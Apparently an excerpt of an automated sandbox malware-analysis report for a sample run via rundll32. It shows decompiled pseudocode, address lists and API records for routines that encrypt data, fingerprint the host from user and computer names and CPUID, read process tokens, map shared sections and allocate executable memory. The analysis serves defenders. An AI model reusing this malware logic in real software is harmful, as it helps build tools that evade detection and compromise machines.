				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xc2a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xc2a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00C25FBC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0xc2a0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xc2a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00C213CC(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x00c2327f
0x00c23285
0x00c23288
0x00c2328e
0x00c2328e
0x00c23290
0x00c23292
0x00c23295
0x00c2329b
0x00c2329c
0x00c2329d
0x00c232a3
0x00c232a8
0x00c232ae
0x00c232b6
0x00c23413
0x00c232bc
0x00c232be
0x00c232c7
0x00c232cc
0x00c232de
0x00c232e1
0x00c232e5
0x00c232ec
0x00c232f0
0x00c232f8
0x00c233fe
0x00c232fe
0x00c232fe
0x00c23302
0x00c23303
0x00c23305
0x00c23310
0x00c233ea
0x00c23316
0x00c23316
0x00c23319
0x00c2331f
0x00c23325
0x00c23325
0x00c2332d
0x00c23331
0x00c23334
0x00c233db
0x00c2333a
0x00c23340
0x00c23343
0x00c23346
0x00c23348
0x00c2334b
0x00c2334e
0x00c23350
0x00c23350
0x00c2335a
0x00c2335f
0x00c23362
0x00c23365
0x00c23367
0x00c23370
0x00c2339a
0x00c23372
0x00c23383
0x00c23383
0x00c233a2
0x00000000
0x00000000
0x00c233a4
0x00c233a7
0x00c233aa
0x00c233ae
0x00000000
0x00c233b0
0x00c233bf
0x00c233c5
0x00c233cd
0x00c233cd
0x00000000
0x00c233ae
0x00c233b2
0x00c233ba
0x00c233bd
0x00c233d4
0x00000000
0x00000000
0x00000000
0x00c233bd
0x00c23334
0x00c233ed
0x00c233f0
0x00c233f0
0x00c23405
0x00c23405
0x00c2341d

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00C26E82,00000001,00C24A9F,00000000), ref: 00C232AE
memcpy.NTDLL(00C26E82,00C24A9F,00000010,?,?,?,00C26E82,00000001,00C24A9F,00000000,?,00C271BA,00000000,00C24A9F,?,00000000), ref: 00C232C7
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00C232F0
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00C23308
memcpy.NTDLL(00000000,00000000,050C9630,00000010), ref: 00C2335A
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,050C9630,00000020,?,?,00000010), ref: 00C23383
GetLastError.KERNEL32(?,?,00000010), ref: 00C233B2
GetLastError.KERNEL32 ref: 00C233E4
CryptDestroyKey.ADVAPI32(00000000), ref: 00C233F0
GetLastError.KERNEL32 ref: 00C233F8
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C23405
GetLastError.KERNEL32(?,?,?,00C26E82,00000001,00C24A9F,00000000,?,00C271BA,00000000,00C24A9F,?,00000000,00C24A9F,00000000,050C9630), ref: 00C2340D

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: eb94abf10002414fdc0b1baaebbc0e01056ed2ea4fa5a05032901331c902e12e
Instruction ID: f23c2ecc973d4f34e9104d09b411ae3fc9a367e8e6c53689bedcb73f02445eeb
Opcode Fuzzy Hash: eb94abf10002414fdc0b1baaebbc0e01056ed2ea4fa5a05032901331c902e12e
Instruction Fuzzy Hash: AC517C71900258FFDF10DFA9EC84AAEBBB9FB08340F108425F911E6660DB758F559B61

Uniqueness

Uniqueness Score: -1.00%

Function 7038F0B0, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000991,00003000,00000040,00000991,7038EB00), ref: 7038F16D
VirtualAlloc.KERNEL32(00000000,000001D2,00003000,00000040,7038EB62), ref: 7038F1A4
VirtualAlloc.KERNEL32(00000000,0000FFCF,00003000,00000040), ref: 7038F204
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7038F23A
VirtualProtect.KERNEL32(70330000,00000000,00000004,7038F08F), ref: 7038F33F
VirtualProtect.KERNEL32(70330000,00001000,00000004,7038F08F), ref: 7038F366
VirtualProtect.KERNEL32(00000000,?,00000002,7038F08F), ref: 7038F433
VirtualProtect.KERNEL32(00000000,?,00000002,7038F08F,?), ref: 7038F489
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7038F4A5

Memory Dump Source

Source File: 00000017.00000002.736035650.000000007038E000.00000040.00020000.sdmp, Offset: 7038E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7038e000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: fbcbb7d7a7928b45885d61a6d7810eaf28c94560c068cb3e5ca8222db54856bd
Instruction ID: cfd89cf91aa3b6e10591c8161bd869064e144ba597e26f279f04d411cdb46090
Opcode Fuzzy Hash: fbcbb7d7a7928b45885d61a6d7810eaf28c94560c068cb3e5ca8222db54856bd
Instruction Fuzzy Hash: E3D17B766206019FDB158F18C880E9677A6FF49310B190399ED099F79ADB3CA819CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 703314FE, Relevance: 13.6, APIs: 9, Instructions: 107
sleepnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E703314FE(intOrPtr _a4) {
				void _v316;
				signed int _v332;
				long _v344;
				long _v348;
				char _v356;
				char _v360;
				long _v364;
				long _v368;
				void* __edi;
				long _t25;
				long _t28;
				long _t31;
				long _t32;
				long _t36;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t49;
				long _t50;
				void* _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				intOrPtr* _t63;

				_t25 = E70331F7C();
				_v348 = _t25;
				if(_t25 != 0) {
					L18:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_v344 = 0;
					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
					_t50 = _t28;
					_t59 = 0x13;
					_t11 = _t50 + 1; // 0x1
					_t60 = _v332 % _t59 + _t11;
					_t31 = E70331B8C(0, _t60); // executed
					_v368 = _t31;
					Sleep(_t60 << 4); // executed
					_t25 = _v368;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L18;
				}
				_t32 = E7033195C(_t50); // executed
				_v364 = _t32;
				if(_t32 != 0) {
					L16:
					_t25 = _v364;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t62 = E70331D2D(E70331768,  &_v356);
					if(_t62 == 0) {
						_v368 = GetLastError();
					} else {
						_t36 = WaitForSingleObject(_t62, 0xffffffff);
						_v368 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t62,  &_v368);
						}
						CloseHandle(_t62);
					}
					goto L16;
				}
				if(E70331637(_t50,  &_v360) != 0) {
					 *0x703341b8 = 0;
					goto L11;
				}
				_t49 = _v360;
				_t63 = __imp__GetLongPathNameW;
				_t42 =  *_t63(_t49, 0, 0); // executed
				_t56 = _t42;
				if(_t56 == 0) {
					L9:
					 *0x703341b8 = _t49;
					goto L11;
				}
				_t19 = _t56 + 2; // 0x2
				_t44 = E70331D8B(_t56 + _t19);
				 *0x703341b8 = _t44;
				if(_t44 == 0) {
					goto L9;
				} else {
					 *_t63(_t49, _t44, _t56); // executed
					E70331E7C(_t49);
					goto L11;
				}
			}

0x7033150d
0x70331516
0x7033151a
0x7033162e
0x70331634
0x00000000
0x00000000
0x00000000
0x70331520
0x70331520
0x70331531
0x70331535
0x7033153b
0x70331543
0x70331548
0x70331548
0x7033154d
0x70331556
0x7033155a
0x70331560
0x70331564
0x7033156b
0x00000000
0x00000000
0x70331571
0x70331578
0x7033157c
0x7033161f
0x7033161f
0x70331626
0x70331628
0x70331628
0x00000000
0x70331626
0x70331585
0x703315d8
0x703315d8
0x703315e9
0x703315ed
0x7033161b
0x703315ef
0x703315f2
0x703315fa
0x703315fe
0x70331606
0x70331606
0x7033160d
0x7033160d
0x00000000
0x703315ed
0x70331593
0x703315d2
0x00000000
0x703315d2
0x70331595
0x70331599
0x703315a2
0x703315a4
0x703315a8
0x703315ca
0x703315ca
0x00000000
0x703315ca
0x703315aa
0x703315af
0x703315b6
0x703315bb
0x00000000
0x703315bd
0x703315c0
0x703315c3
0x00000000
0x703315c3

APIs

Part of subcall function 70331F7C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,70331512,74B063F0,00000000), ref: 70331F8B
Part of subcall function 70331F7C: GetVersion.KERNEL32 ref: 70331F9A
Part of subcall function 70331F7C: GetCurrentProcessId.KERNEL32 ref: 70331FA9
Part of subcall function 70331F7C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 70331FC2

NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 70331535

Part of subcall function 70331B8C: VirtualAlloc.KERNELBASE(00000000,70331552,00003000,00000004,?,?,70331552,00000001), ref: 70331BE2
Part of subcall function 70331B8C: memcpy.NTDLL(?,?,70331552,?,?,70331552,00000001), ref: 70331C7D
Part of subcall function 70331B8C: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,70331552,00000001), ref: 70331C98

Sleep.KERNELBASE(00000001,00000001), ref: 7033155A
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 703315A2
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 703315C0
WaitForSingleObject.KERNEL32(00000000,000000FF,70331768,?,00000000), ref: 703315F2
GetExitCodeThread.KERNEL32(00000000,?), ref: 70331606
CloseHandle.KERNEL32(00000000), ref: 7033160D
GetLastError.KERNEL32(70331768,?,00000000), ref: 70331615
GetLastError.KERNEL32 ref: 70331628

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
String ID:
API String ID: 2016936029-0
Opcode ID: d1c06a9257cb29644c6be29abc31681e2c22326f438727223e60ba6b09aa9941
Instruction ID: 5729ba636985de4bcb909d750c185955427e087814b5e27f0c90df005d9e5736
Opcode Fuzzy Hash: d1c06a9257cb29644c6be29abc31681e2c22326f438727223e60ba6b09aa9941
Instruction Fuzzy Hash: 6F31D072904305AFD301DF658CC5A5FFBECAB89711F94092AF952C6350EB74D9098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 703310ED, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E703310ED(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L70332220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x703341d0;
				_push(_t15 + 0x7033505e);
				_push(_t15 + 0x70335054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L7033221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x703341c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x703310ed
0x703310f6
0x703310fa
0x70331100
0x70331105
0x7033110a
0x7033110d
0x70331110
0x70331115
0x70331116
0x70331119
0x70331124
0x7033112b
0x7033112f
0x70331131
0x70331132
0x70331135
0x7033113a
0x70331144
0x70331146
0x70331146
0x7033115a
0x70331160
0x70331164
0x703311b4
0x70331166
0x7033116f
0x70331185
0x7033118d
0x7033119f
0x703311a3
0x00000000
0x00000000
0x7033118f
0x70331192
0x70331197
0x70331199
0x70331199
0x7033117a
0x7033117c
0x703311a5
0x703311a6
0x703311a6
0x7033116f
0x703311bc

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?,?), ref: 703310FA
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70331110
_snwprintf.NTDLL ref: 70331135
CreateFileMappingW.KERNELBASE(000000FF,703341C0,00000004,00000000,?,?), ref: 7033115A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?), ref: 70331171
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 70331185
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?), ref: 7033119D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A), ref: 703311A6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,703317EA,0000000A,?), ref: 703311AE

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 37c58f838bd2b798c68288635744b59ad4bc147901400bb69b5b41f3460da3c9
Instruction ID: 54299801e15748fe4135889c78ac3e82ebb4b501fdcefad5af7a0b4fc71015fa
Opcode Fuzzy Hash: 37c58f838bd2b798c68288635744b59ad4bc147901400bb69b5b41f3460da3c9
Instruction Fuzzy Hash: 1A21AFB2E00108BFDB15AFA8CCC4EDEBBBDEB58350F618129F616D7250D6749945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C26CD6, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00C26CD6(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xc2a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00C259CB( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xc2a2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xc2a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00C256BF(_v8 + _v8, _t63);
							}
							HeapFree( *0xc2a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xc2a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00C256BF(_v8 + _v8, _t63);
						}
						HeapFree( *0xc2a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00c26cd6
0x00c26cde
0x00c26ce4
0x00c26ce7
0x00c26cea
0x00c26cec
0x00c26cf1
0x00c26cf1
0x00c26cf7
0x00c26cf9
0x00c26d06
0x00c26d67
0x00c26d08
0x00c26d0d
0x00c26d13
0x00c26d18
0x00c26d26
0x00c26d2a
0x00c26d39
0x00c26d40
0x00c26d47
0x00c26d47
0x00c26d52
0x00c26d52
0x00c26d2a
0x00c26d18
0x00c26d69
0x00c26d6f
0x00c26d79
0x00c26d7b
0x00c26d80
0x00c26d8f
0x00c26d93
0x00c26d9e
0x00c26da5
0x00c26dac
0x00c26dac
0x00c26db8
0x00c26db8
0x00c26d93
0x00c26dc1
0x00c26dc3
0x00c26dc6
0x00c26dc8
0x00c26dcb
0x00c26dce
0x00c26dd8
0x00c26ddc
0x00c26de0

APIs

GetUserNameW.ADVAPI32(00000000,00C2453B), ref: 00C26D0D
RtlAllocateHeap.NTDLL(00000000,00C2453B), ref: 00C26D24
GetUserNameW.ADVAPI32(00000000,00C2453B), ref: 00C26D31
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00C2453B,?,?,?,?,?,00C268F7,?,00000001), ref: 00C26D52
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C26D79
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C26D8D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C26D9A
HeapFree.KERNEL32(00000000,00000000), ref: 00C26DB8

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 2d80e13d29f1009d17edf1b921a923fadb13d5a0f2b9801f7012a5d22a7c5588
Instruction ID: 127e36e800896e171114c77ade9dd95a50c017cb565a143f300adb7547f42c25
Opcode Fuzzy Hash: 2d80e13d29f1009d17edf1b921a923fadb13d5a0f2b9801f7012a5d22a7c5588
Instruction Fuzzy Hash: 4A313C71A10209EFDB21DFA9ED81BAEB7F9FB48700F204069E509D7A20D771DE019B21

Uniqueness

Uniqueness Score: -1.00%

Function 00C240DC, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00C240DC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00C25FBC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00C213CC(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00c240e9
0x00c240ea
0x00c240eb
0x00c240ec
0x00c240ed
0x00c240f1
0x00c240f8
0x00c24107
0x00c2410a
0x00c2410d
0x00c24114
0x00c24117
0x00c2411a
0x00c2411d
0x00c24120
0x00c2412b
0x00c2412d
0x00c24136
0x00c2413e
0x00c24140
0x00c24152
0x00c2415c
0x00c24160
0x00c2416f
0x00c24173
0x00c2417c
0x00c24184
0x00c24184
0x00c24186
0x00c24186
0x00c2418e
0x00c24194
0x00c24198
0x00c24198
0x00c241a3

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00C24123
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00C24136
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00C24152

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00C2416F
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00C2417C
NtClose.NTDLL(00000000), ref: 00C2418E
NtClose.NTDLL(00000000), ref: 00C24198

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: a8be668f291ffb1ccb6af6c8f7dfb89882de52f7e9491f92cb86ebfe2a03efca
Instruction ID: 2e5b5246ad4cf8826d8ffe40be43f9f5e676eaaa95aafc6d819ecd2902aff17f
Opcode Fuzzy Hash: a8be668f291ffb1ccb6af6c8f7dfb89882de52f7e9491f92cb86ebfe2a03efca
Instruction Fuzzy Hash: B72137B2910229BBDF11EF95DC45EDEBFBDEF08750F104066FA04E6160D7718A519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 70331382, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E70331382(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E70331B4A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x7033138b
0x70331392
0x70331393
0x70331394
0x70331395
0x70331396
0x703313a7
0x703313ab
0x703313bf
0x703313c2
0x703313c5
0x703313cc
0x703313cf
0x703313d6
0x703313d9
0x703313dc
0x703313df
0x703313e4
0x7033141f
0x703313e6
0x703313e9
0x703313ef
0x703313f4
0x703313f8
0x70331416
0x703313fa
0x70331401
0x7033140f
0x7033140f
0x703313f8
0x70331427

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 703313DF

Part of subcall function 70331B4A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,703313F4,00000002,00000000,?,?,00000000,?,?,703313F4,00000000), ref: 70331B77

memset.NTDLL ref: 70331401

Strings

@, xrefs: 703313CF

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
Instruction ID: 6e51b37ca4d85f2a613b55545fa08d6b3311cbcba76de076685cf141cd4ecc2d
Opcode Fuzzy Hash: e626fc497942014fb776a75f9bfd3a3f913195e61ff3eac049c0a55d52b94462
Instruction Fuzzy Hash: 00211AB2D00209AFCB11CFA9C8849DEFBB9EF48354F508439E606F7210D730AA458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 70331A0A, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70331A0A(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
